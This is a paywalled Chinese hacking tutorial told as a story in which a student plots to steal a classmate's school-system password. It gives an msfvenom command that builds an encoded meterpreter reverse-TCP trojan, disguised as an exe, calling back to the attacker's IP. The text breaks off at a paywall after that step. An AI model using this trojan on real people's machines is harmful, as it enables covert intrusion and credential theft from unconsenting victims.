引言
听说网络安全的成绩出来了,小丽迫不及待的进入教务管理系统,输入学号,密码查看自己的成绩,哇塞90分,不知小七考的怎么样,不过那个闷葫芦肯定不会告诉我的,要是我能知道她密码多好,就可以自己去看了,突然小丽想到,自己用wireshark抓到登陆教务系统的包中,竟然可看自己的用户名和密码,如果我能抓到小七登陆教务系统的包,那她的密码,她的成绩。。嘿嘿嘿,可我电脑上的wireshark只能抓经过我电脑网卡的包,不可能在小七电脑上装个wireshark抓包吧….该怎么办呢?总会有办法的,姐前几天Metasploit可不是白学的,等小七回来查成绩了,看我如何获取的她账号和密码!
撸起袖子干
实验环境
- kali linux(小丽)
WinXPenSP3(小七)
工具
1、 Metasploit
2、 msfvenom
3、 wireshark
制作并植入木马
‘’小七你回来了,网络成绩出来了”,“哦”,小七坐下来,打开了电脑,我也要开始行动了。。
1、 进入kali linux系统,打开Metasploit
2、 先利用msfvenom制作一个加密的木马,名字叫xiaoqi的exe程序,lhost是小丽(攻击者)电脑的ip,放入software文件夹中。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.139.131 LPORT=4444 -f exe > software/xiaoqi.exe
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
